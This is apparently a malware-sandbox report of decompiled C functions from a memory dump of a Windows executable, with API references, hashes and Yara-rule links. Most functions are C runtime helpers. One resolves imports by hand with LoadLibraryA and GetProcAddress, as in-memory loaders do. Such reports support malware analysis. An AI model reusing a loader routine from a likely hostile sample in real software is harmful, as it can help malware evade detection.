COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00439F16(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				char _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E0042C9F1( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E00434FE8( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E0042FC8F(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0x50036ad0
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0x50036ad0
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t26 = _t56 + 0xac; // 0x50036ad0
								_t57 =  *_t26;
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x00439f20
0x00439f27
0x00439f3e
0x00000000
0x00439f2e
0x00439f30
0x00439f4a
0x00439f4f
0x00439f52
0x00439f55
0x00439f7d
0x00439f84
0x00439f86
0x0043a007
0x0043a019
0x0043a022
0x0043a024
0x00439f64
0x00439f64
0x00439f67
0x00439f69
0x00439f6c
0x00439f6c
0x00439f6c
0x00439f6c
0x00000000
0x00439f72
0x00439fe6
0x00439fe6
0x00439feb
0x00439ff1
0x00439ff4
0x00439ff6
0x00439ff9
0x00439ff9
0x00439ff9
0x00439ff9
0x00000000
0x00439ffd
0x00439f88
0x00439f8b
0x00439f8b
0x00439f91
0x00439f94
0x00439fbb
0x00439fbe
0x00439fbe
0x00439fc4
0x00000000
0x00000000
0x00439fc6
0x00439fc9
0x00000000
0x00000000
0x00439fcb
0x00439fcb
0x00439fcb
0x00439fd1
0x00439fd4
0x00439f43
0x00439f43
0x00439fdd
0x00000000
0x00439fdd
0x00439f96
0x00439f99
0x00000000
0x00000000
0x00439f9d
0x00439fab
0x00439fae
0x00439fb4
0x00439fb6
0x00439fb9
0x00000000
0x00000000
0x00000000
0x00439fb9
0x00439f57
0x00439f5a
0x00439f5c
0x00439f61
0x00439f61
0x00000000
0x00439f32
0x00439f32
0x00439f37
0x00439f3b
0x00439f3b
0x00000000
0x00439f37
0x00439f30

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00439F4A
__isleadbyte_l.LIBCMT ref: 00439F7D
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,0043B4F8,00000109,00BFBBEF,00000003), ref: 00439FAE
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,0043B4F8,00000109,00BFBBEF,00000003), ref: 0043A01C

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 49c16a564d5d6b9aa25b5b0b0347ef857a1f5f8cd45f7af00c79bcdcb189338e
Instruction ID: 3f22d8aac56d3293b2c36a0c2c895574e8411fa7a8fda5945ad5ab3469c75f0b
Opcode Fuzzy Hash: 49c16a564d5d6b9aa25b5b0b0347ef857a1f5f8cd45f7af00c79bcdcb189338e
Instruction Fuzzy Hash: 4B31CE31A04246EFDB20DF64C8809BE7BB5AF09311F1885AAF461CB291D374DD40DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00423470 Relevance: 6.1, APIs: 4, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00423470(char* _a4, char _a8, intOrPtr _a28) {
				intOrPtr _v8;
				char _v16;
				void* _v17;
				intOrPtr _v24;
				void* __edi;
				void* __esi;
				signed int _t28;
				char* _t32;
				void* _t37;
				void* _t40;
				signed int _t51;
				char* _t69;
				void* _t71;
				void* _t72;
				signed int _t74;

				_push(0xffffffff);
				_push(E0043F9A8);
				_push( *[fs:0x0]);
				_push(_t71);
				_t28 =  *0x451f00; // 0xc21d6f0a
				_push(_t28 ^ _t74);
				 *[fs:0x0] =  &_v16;
				_t69 = _a4;
				_v24 = 0;
				_v8 = 0;
				_t32 = _a8;
				if(_a28 < 0x10) {
					_t32 =  &_a8;
				}
				_t51 = E0042BC70(_t32);
				_t37 = _t51 - (0xaaaaaaab * _t51 >> 0x20 >> 1) + (0xaaaaaaab * _t51 >> 0x20 >> 1) * 2;
				if(_t37 != 0) {
					_t51 = _t51 - _t37 + 3;
				}
				_t40 = E0042BDF8((0xaaaaaaab * (_t51 + _t51 + _t51 + _t51 + _t51 + _t51 + _t51 + _t51) >> 0x20 >> 2) + 1, _t69, _t71, (0xaaaaaaab * (_t51 + _t51 + _t51 + _t51 + _t51 + _t51 + _t51 + _t51) >> 0x20 >> 2) + 1);
				_t49 = _a8;
				_t72 = _t40;
				_t41 = _a8;
				if(_a28 < 0x10) {
					_t41 =  &_a8;
					_t49 =  &_a8;
				}
				E00420350(_t49, E0042BC70(_t41), _t72);
				 *((intOrPtr*)(_t69 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t69 + 0x10)) = 0;
				 *_t69 = 0;
				E00404BC0(_t69, _t72, E0042BC70(_t72));
				if(_a28 >= 0x10) {
					_push(_a8);
					E0042A289();
				}
				 *[fs:0x0] = _v16;
				return _t69;
			}

0x00423473
0x00423475
0x00423480
0x00423485
0x00423487
0x0042348e
0x00423492
0x00423498
0x0042349d
0x004234a4
0x004234a7
0x004234aa
0x004234ac
0x004234ac
0x004234b5
0x004234c8
0x004234ca
0x004234ce
0x004234ce
0x004234e3
0x004234eb
0x004234f1
0x004234f3
0x004234f8
0x004234fa
0x004234fd
0x004234fd
0x0042350e
0x00423513
0x0042351a
0x00423522
0x00423531
0x0042353a
0x0042353f
0x00423540
0x00423545
0x0042354d
0x0042355b

APIs

_strlen.LIBCMT ref: 004234B0
_malloc.LIBCMT ref: 004234E3
_strlen.LIBCMT ref: 00423501
_strlen.LIBCMT ref: 00423525

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _strlen$_malloc
String ID:
API String ID: 1848352940-0
Opcode ID: ae9de72a412a6aa11bb536446c0856e75ad357082b4c8701a0aec3f728a03d12
Instruction ID: 3ec3919dcaea59893fe4720db024cbdeb0934e7989126385f163071e67f19e70
Opcode Fuzzy Hash: ae9de72a412a6aa11bb536446c0856e75ad357082b4c8701a0aec3f728a03d12
Instruction Fuzzy Hash: 6B21B4B1700118ABDB08DF29DC41BAE77E8EB49324F44823EF806D7341E73DAA048795

Uniqueness

Uniqueness Score: -1.00%

Function 00403EBB Relevance: 6.1, APIs: 4, Instructions: 88
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403EBB(intOrPtr __eax, void* __edi, signed short* __esi) {
				intOrPtr _t32;
				signed int _t35;
				intOrPtr _t37;
				signed short _t38;
				CHAR* _t39;
				_Unknown_base(*)()* _t40;
				signed int _t42;
				intOrPtr _t50;
				signed short* _t52;
				intOrPtr _t54;
				intOrPtr* _t59;
				struct HINSTANCE__* _t63;
				void* _t66;
				signed short* _t67;
				intOrPtr _t69;
				void* _t74;
				void* _t79;
				void* _t81;

				_t67 = __esi;
				_t66 = __edi;
				_t32 = __eax;
				while(1) {
					_t50 =  *((intOrPtr*)(_t74 - 4));
					_t63 = LoadLibraryA( *((intOrPtr*)(_t66 + 0x144)) + _t32);
					 *(_t74 - 8) = _t63;
					if(_t63 == 0) {
						break;
					}
					_t35 =  *(_t66 + 0x154);
					if( *(_t66 + 0x150) < _t35) {
						_t69 =  *((intOrPtr*)(_t74 - 0xc));
						goto L12;
					} else {
						if(_t35 == 0) {
							_t42 = 0x10;
						} else {
							_t42 = _t35 + _t35;
						}
						 *(_t66 + 0x154) = _t42;
						_t69 = E0042BDF8(_t42 * 4, _t66, _t67, _t42 * 4);
						_t81 = _t79 + 4;
						 *((intOrPtr*)(_t74 - 0xc)) = _t69;
						if(_t69 == 0) {
							return 3;
						} else {
							_t45 =  *(_t66 + 0x150);
							if( *(_t66 + 0x150) != 0) {
								E0042B8D0(_t69,  *((intOrPtr*)(_t66 + 0x14c)), _t45 + _t45 + _t45 + _t45);
								_t81 = _t81 + 0xc;
							}
							E0042BE8C( *((intOrPtr*)(_t66 + 0x14c)));
							_t63 =  *(_t74 - 8);
							_t79 = _t81 + 4;
							 *((intOrPtr*)(_t66 + 0x14c)) = _t69;
							L12:
							_t59 =  *((intOrPtr*)(_t74 - 4));
							 *(_t69 +  *(_t66 + 0x150) * 4) = _t63;
							 *(_t66 + 0x150) =  *(_t66 + 0x150) + 1;
							_t37 =  *((intOrPtr*)(_t66 + 0x144));
							_t67 =  *((intOrPtr*)(_t50 + 0x10)) + _t37;
							_t52 = _t67;
							if( *((intOrPtr*)(_t59 + 4)) == 0) {
								L15:
								_t38 =  *_t52;
								if(_t38 == 0) {
									L24:
									_t32 =  *((intOrPtr*)(_t59 + 0x20));
									 *((intOrPtr*)(_t74 - 4)) = _t59 + 0x14;
									if(_t32 != 0) {
										continue;
									} else {
										return _t32;
									}
								} else {
									L18:
									while(1) {
										if(_t38 >= 0) {
											_t39 = _t38 +  *((intOrPtr*)(_t66 + 0x144)) + 2;
										} else {
											_t39 = _t38 & 0x0000ffff;
										}
										_t40 = GetProcAddress(_t63, _t39);
										 *_t67 = _t40;
										if(_t40 == 0) {
											goto L28;
										} else {
											_t38 = _t52[2];
											_t52 =  &(_t52[2]);
											_t67 =  &(_t67[2]);
											if(_t38 != 0) {
												_t63 =  *(_t74 - 8);
												continue;
											} else {
												_t59 =  *((intOrPtr*)(_t74 - 4));
												goto L24;
											}
										}
										goto L29;
									}
								}
							} else {
								_t54 =  *_t59;
								if(_t54 == 0) {
									return 8;
								} else {
									_t52 = _t54 + _t37;
									goto L15;
								}
							}
						}
					}
					L29:
				}
				L28:
				return 6;
				goto L29;
			}

0x00403ebb
0x00403ebb
0x00403ebb
0x00403ec0
0x00403ec0
0x00403ed2
0x00403ed4
0x00403ed9
0x00000000
0x00000000
0x00403edf
0x00403eeb
0x00403f56
0x00000000
0x00403eed
0x00403eef
0x00403ef5
0x00403ef1
0x00403ef1
0x00403ef1
0x00403f02
0x00403f0d
0x00403f0f
0x00403f12
0x00403f17
0x00403fe5
0x00403f1d
0x00403f1d
0x00403f25
0x00403f34
0x00403f39
0x00403f39
0x00403f43
0x00403f48
0x00403f4b
0x00403f4e
0x00403f59
0x00403f5f
0x00403f62
0x00403f65
0x00403f6e
0x00403f74
0x00403f7a
0x00403f7c
0x00403f86
0x00403f86
0x00403f8a
0x00403fc4
0x00403fc4
0x00403fca
0x00403fcf
0x00000000
0x00403fd5
0x00403fda
0x00403fda
0x00403f8c
0x00000000
0x00403f93
0x00403f95
0x00403fa2
0x00403f97
0x00403f97
0x00403f97
0x00403fa8
0x00403fae
0x00403fb2
0x00000000
0x00403fb4
0x00403fb4
0x00403fb7
0x00403fba
0x00403fbf
0x00403f90
0x00000000
0x00403fc1
0x00403fc1
0x00000000
0x00403fc1
0x00403fbf
0x00000000
0x00403fb2
0x00403f93
0x00403f7e
0x00403f7e
0x00403f82
0x00403ff0
0x00403f84
0x00403f84
0x00000000
0x00403f84
0x00403f82
0x00403f7c
0x00403f17
0x00000000
0x00403eeb
0x00403ff1
0x00403ffb
0x00000000

APIs

LoadLibraryA.KERNEL32(?), ref: 00403ECC
_malloc.LIBCMT ref: 00403F08
_free.LIBCMT ref: 00403F43
GetProcAddress.KERNEL32(00000000,?), ref: 00403FA8

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: AddressLibraryLoadProc_free_malloc
String ID:
API String ID: 4158704167-0
Opcode ID: b282572e966ca9a8d9feefeb4691f3524afd61cb5c13661301584d6da2ffb77e
Instruction ID: 1a727fbace46259e0dbf23909a1f1d7b8c940dad354ac1844a9e02bea305fdbe
Opcode Fuzzy Hash: b282572e966ca9a8d9feefeb4691f3524afd61cb5c13661301584d6da2ffb77e
Instruction Fuzzy Hash: 55315075B00612EBD714CF65D8447A6BBB8BF4530AF14417AEC09EB341E739EE118B98

Uniqueness

Uniqueness Score: -1.00%

Function 00427320 Relevance: 6.1, APIs: 4, Instructions: 86
timeCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00427320(intOrPtr __ecx, intOrPtr __edi) {
				signed int _v8;
				struct _SYSTEMTIME _v24;
				struct _SYSTEMTIME _v40;
				struct _FILETIME _v48;
				struct _FILETIME _v56;
				void* __ebx;
				void* __esi;
				signed int _t37;
				intOrPtr _t44;
				intOrPtr _t63;
				intOrPtr _t77;
				intOrPtr _t84;
				signed int _t85;

				_t37 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t37 ^ _t85;
				_t84 = __ecx;
				 *((intOrPtr*)(__ecx + 0x7c)) = 0;
				 *((intOrPtr*)(__ecx + 0x84)) = 0;
				 *((char*)(__ecx + 0x80)) = 0;
				 *((intOrPtr*)(__ecx + 0x78)) = 0;
				 *((intOrPtr*)(__ecx + 0x90)) = 0;
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				 *((intOrPtr*)(__ecx + 0x4c)) = 0x41c00010;
				 *((intOrPtr*)(__ecx + 0x70)) = 0;
				 *((char*)(__ecx + 0x6c)) = 0;
				GetLocalTime( &_v40);
				SystemTimeToFileTime( &_v40,  &_v48);
				_v56.dwLowDateTime = _v48.dwLowDateTime;
				_v56.dwHighDateTime = _v48.dwHighDateTime;
				FileTimeToSystemTime( &_v56,  &_v24);
				_t77 = _v48.dwHighDateTime;
				asm("sbb edx, 0x19db1de");
				_t44 = E0042CF60(_v48.dwLowDateTime - 0xd53e8000, _t77, 0x989680, 0);
				 *((intOrPtr*)(_t84 + 0x50)) = _t44;
				 *((intOrPtr*)(_t84 + 0x58)) = _t44;
				 *((intOrPtr*)(_t84 + 0x60)) = _t44;
				_t63 = _t77;
				 *((intOrPtr*)(_t84 + 0x5c)) = _t63;
				 *((intOrPtr*)(_t84 + 0x64)) = _t63;
				 *((intOrPtr*)(_t84 + 0x54)) = _t77;
				 *(_t84 + 0x68) = ((_v24.wYear + 0xffffffc4 << 0x00000004 | _v24.wMonth & 0x0000000f) << 0x00000005 & 0x0000ffff | _v24.wDay & 0x0000001f) << 0x00000010 | (_v24.wMinute & 0x0000003f | _v24.wHour << 0x00000006) << 0x00000005 & 0x0000ffff | _v24.wSecond + _v24.wSecond & 0x0000001f;
				return E0042A36A(0, 0, _v8 ^ _t85, ((_v24.wYear + 0xffffffc4 << 0x00000004 | _v24.wMonth & 0x0000000f) << 0x00000005 & 0x0000ffff | _v24.wDay & 0x0000001f) << 0x00000010 | (_v24.wMinute & 0x0000003f | _v24.wHour << 0x00000006) << 0x00000005 & 0x0000ffff | _v24.wSecond + _v24.wSecond & 0x0000001f, __edi, _t84);
			}

0x00427326
0x0042732d
0x00427334
0x0042733a
0x0042733d
0x00427343
0x00427349
0x0042734c
0x00427352
0x00427355
0x0042735c
0x0042735f
0x00427362
0x00427370
0x0042737f
0x00427387
0x0042738a
0x00427393
0x004273a2
0x004273aa
0x004273af
0x004273b2
0x004273b5
0x004273bb
0x004273bd
0x004273c0
0x004273d7
0x00427409
0x0042741a

APIs

GetLocalTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00428DF5), ref: 00427362
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00428DF5), ref: 00427370
FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00428DF5), ref: 0042738A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004273AA

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 568878067-0
Opcode ID: b9bb935292884d80d392e977c3d429437dca57234bd9cdc49e1b7e63d749c992
Instruction ID: 2d0e028843f971eaaf34117e5859df71aa74c7c18e4de00fcea310e40dfeabaf
Opcode Fuzzy Hash: b9bb935292884d80d392e977c3d429437dca57234bd9cdc49e1b7e63d749c992
Instruction Fuzzy Hash: 60314CB1D007089FDB18CFA9C9909AEFBF5FB88704B40892EE596E3750D770A904CB14

Uniqueness

Uniqueness Score: -1.00%

Function 00435DDF Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00435DDF(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E004356D1(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E004357B8(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00435CF2(__ebx, __edx, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00435C31(__ebx, __edx, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x00435de4
0x00435dea
0x00435e5d
0x00000000
0x00435df1
0x00435df1
0x00435df4
0x00435e0f
0x00435e12
0x00435e32
0x00435e44
0x00435e14
0x00435e14
0x00435e17
0x00000000
0x00435e19
0x00435e2b
0x00435e2b
0x00435e17
0x00435e62
0x00435e66
0x00435df6
0x00435e0e
0x00435e0e
0x00435df4

APIs

__cftof_l.LIBCMT ref: 00435E05

Part of subcall function 00435C31: __fltout2.LIBCMT ref: 00435C5C

__cftog_l.LIBCMT ref: 00435E2B
__cftoe_l.LIBCMT ref: 00435E5D

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 939b1cb47e5fe61f6df370db078edf1595fa27b4787e2545d2fde0ee524b9d48
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 9D114E7204054EBBCF125F85CC068EE3F66BB1C354F589416FE5859131D33ACAB1AB85

Uniqueness

Uniqueness Score: -1.00%

Function 00419B50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00419B50(signed int __ecx, signed int* __edx, signed int _a4) {
				signed int _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v28;
				signed int _v32;
				char _v48;
				char _v51;
				signed int _v52;
				char _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t63;
				signed int _t64;
				signed int _t66;
				char* _t70;
				char* _t71;
				signed int _t75;
				signed int _t77;
				void* _t82;
				signed int* _t86;
				signed int _t88;
				intOrPtr _t89;
				intOrPtr _t90;
				signed int _t93;
				intOrPtr* _t98;
				char* _t105;
				char* _t111;
				intOrPtr _t118;
				signed int _t121;
				signed int _t123;
				intOrPtr _t124;
				signed int _t128;
				signed int _t129;
				void* _t130;
				void* _t131;
				void* _t132;

				_t110 = __edx;
				_push(0xffffffff);
				_push(E0043EE58);
				_push( *[fs:0x0]);
				_t131 = _t130 - 0x2c;
				_t63 =  *0x451f00; // 0xc21d6f0a
				_t64 = _t63 ^ _t129;
				_v20 = _t64;
				_push(_t64);
				 *[fs:0x0] =  &_v16;
				_t88 = _a4;
				_t123 = __ecx;
				if(_t88 != 0xffffffff) {
					_t66 =  *(__ecx + 0x24);
					_t93 =  *_t66;
					__eflags = _t93;
					if(_t93 == 0) {
						L5:
						__eflags =  *(_t123 + 0x54);
						if( *(_t123 + 0x54) == 0) {
							L37:
							_t67 = _t66 | 0xffffffff;
							__eflags = _t66 | 0xffffffff;
							L38:
							 *[fs:0x0] = _v16;
							_pop(_t118);
							_pop(_t124);
							_pop(_t89);
							return E0042A36A(_t67, _t89, _v20 ^ _t129, _t110, _t118, _t124);
						}
						_t98 =  *((intOrPtr*)(_t123 + 0x10));
						_t110 = _t123 + 0x48;
						__eflags =  *_t98 - _t123 + 0x48;
						if( *_t98 == _t123 + 0x48) {
							 *_t98 =  *((intOrPtr*)(_t123 + 0x3c));
							 *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x20)))) =  *((intOrPtr*)(_t123 + 0x40));
							_t110 =  *((intOrPtr*)(_t123 + 0x30));
							__eflags = 0;
							 *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x30)))) = 0;
						}
						__eflags =  *(_t123 + 0x44);
						if(__eflags != 0) {
							_v52 = _t88;
							_v28 = 0xf;
							_v32 = 0;
							_v48 = 0;
							E0042A2F0( &_v48, 0, 8);
							_t70 = _v48;
							_t132 = _t131 + 0xc;
							__eflags = _v28 - 0x10;
							_v32 = 8;
							if(_v28 < 0x10) {
								_t70 =  &_v48;
							}
							 *((char*)(_t70 + 8)) = 0;
							_v8 = 0;
							while(1) {
								L14:
								_t71 = _v48;
								_t90 = _v28;
								while(1) {
									_t111 = _t71;
									__eflags = _t90 - 0x10;
									if(_t90 < 0x10) {
										_t111 =  &_v48;
										_t71 = _t111;
									}
									_t110 =  &_v52;
									_t75 =  *((intOrPtr*)( *((intOrPtr*)( *( *(_t123 + 0x44)) + 0x14))))(_t123 + 0x4c,  &_v52,  &_v51,  &_v60, _t71, _t111 + _v32,  &_v56);
									__eflags = _t75;
									if(_t75 < 0) {
										break;
									}
									__eflags = _t75 - 1;
									if(_t75 > 1) {
										__eflags = _t75 - 3;
										if(__eflags != 0) {
											break;
										}
										_t77 = E00418FA0(__eflags, _v52,  *(_t123 + 0x54));
										__eflags = _t77;
										if(_t77 == 0) {
											E0040A450( &_v48);
											_t67 = _t123 | 0xffffffff;
										} else {
											E0040A450( &_v48);
											_t67 = _a4;
										}
										goto L38;
									}
									_t90 = _v28;
									_t71 = _v48;
									_t105 = _t71;
									__eflags = _t90 - 0x10;
									if(_t90 < 0x10) {
										_t105 =  &_v48;
									}
									_t121 = _v56 - _t105;
									__eflags = _t121;
									if(_t121 == 0) {
										L26:
										_t110 =  &_v52;
										 *((char*)(_t123 + 0x49)) = 1;
										__eflags = _v60 -  &_v52;
										if(_v60 !=  &_v52) {
											E0040A450( &_v48);
											_t67 = _a4;
											goto L38;
										}
										__eflags = _t121;
										if(_t121 != 0) {
											continue;
										}
										__eflags = _v32 - 0x20;
										_t101 =  &_v48;
										if(_v32 >= 0x20) {
											L36:
											_t66 = E0040A450(_t101);
											goto L37;
										}
										E0040A5D0( &_v48, 8, _t121);
										goto L14;
									} else {
										__eflags = _t90 - 0x10;
										if(__eflags < 0) {
											_t71 =  &_v48;
										}
										_push( *(_t123 + 0x54));
										_push(_t121);
										_push(1);
										_push(_t71);
										_t82 = E0042DBD7(_t90, _t110, _t121, _t123, __eflags);
										_t132 = _t132 + 0x10;
										__eflags = _t121 - _t82;
										if(_t121 != _t82) {
											break;
										} else {
											_t90 = _v28;
											_t71 = _v48;
											goto L26;
										}
									}
								}
								_t101 =  &_v48;
								goto L36;
							}
						} else {
							_push( *(_t123 + 0x54));
							_push(_t88);
							_t66 = E0042D332(_t88, 0,  *(_t123 + 0x54), __eflags);
							__eflags = _t66 - 0xffffffff;
							if(_t66 == 0xffffffff) {
								goto L37;
							}
							_t67 = _t88;
							goto L38;
						}
					}
					_t66 =  *(__ecx + 0x34);
					_t110 =  *_t66 + _t93;
					__eflags = _t93 -  *_t66 + _t93;
					if(_t93 >=  *_t66 + _t93) {
						goto L5;
					}
					 *_t66 =  *_t66 - 1;
					_t128 =  *(__ecx + 0x24);
					_t86 =  *_t128;
					 *_t128 =  &(_t86[0]);
					 *_t86 = _t88;
					_t67 = _t88;
					goto L38;
				}
				_t67 = 0;
				goto L38;
			}

0x00419b50
0x00419b53
0x00419b55
0x00419b60
0x00419b61
0x00419b64
0x00419b69
0x00419b6b
0x00419b71
0x00419b75
0x00419b7b
0x00419b7e
0x00419b83
0x00419b8c
0x00419b8f
0x00419b93
0x00419b95
0x00419bb7
0x00419bb7
0x00419bba
0x00419d2e
0x00419d2e
0x00419d2e
0x00419d31
0x00419d34
0x00419d3c
0x00419d3d
0x00419d3e
0x00419d4c
0x00419d4c
0x00419bc0
0x00419bc3
0x00419bc6
0x00419bc8
0x00419bd0
0x00419bd5
0x00419bd7
0x00419bda
0x00419bdc
0x00419bdc
0x00419bde
0x00419be1
0x00419c0a
0x00419c0d
0x00419c14
0x00419c17
0x00419c1b
0x00419c20
0x00419c23
0x00419c26
0x00419c2a
0x00419c31
0x00419c33
0x00419c33
0x00419c36
0x00419c3a
0x00419c3d
0x00419c3d
0x00419c3d
0x00419c40
0x00419c43
0x00419c43
0x00419c45
0x00419c48
0x00419c4a
0x00419c4d
0x00419c4d
0x00419c65
0x00419c70
0x00419c72
0x00419c74
0x00000000
0x00000000
0x00419c7a
0x00419c7d
0x00419ce2
0x00419ce5
0x00000000
0x00000000
0x00419cef
0x00419cf7
0x00419cf9
0x00419d10
0x00419d15
0x00419cfb
0x00419d01
0x00419d06
0x00419d06
0x00000000
0x00419cf9
0x00419c7f
0x00419c82
0x00419c85
0x00419c87
0x00419c8a
0x00419c8c
0x00419c8c
0x00419c92
0x00419c92
0x00419c94
0x00419cb8
0x00419cb8
0x00419cbb
0x00419cbf
0x00419cc2
0x00419d1c
0x00419d21
0x00000000
0x00419d21
0x00419cc4
0x00419cc6
0x00000000
0x00000000
0x00419ccc
0x00419cd0
0x00419cd3
0x00419d29
0x00419d29
0x00000000
0x00419d29
0x00419cd8
0x00000000
0x00419c96
0x00419c96
0x00419c99
0x00419c9b
0x00419c9b
0x00419ca1
0x00419ca2
0x00419ca3
0x00419ca5
0x00419ca6
0x00419cab
0x00419cae
0x00419cb0
0x00000000
0x00419cb2
0x00419cb2
0x00419cb5
0x00000000
0x00419cb5
0x00419cb0
0x00419c94
0x00419d26
0x00000000
0x00419d26
0x00419be3
0x00419be9
0x00419bea
0x00419beb
0x00419bf3
0x00419bf6
0x00000000
0x00000000
0x00419bfc
0x00000000
0x00419bfc
0x00419be1
0x00419b97
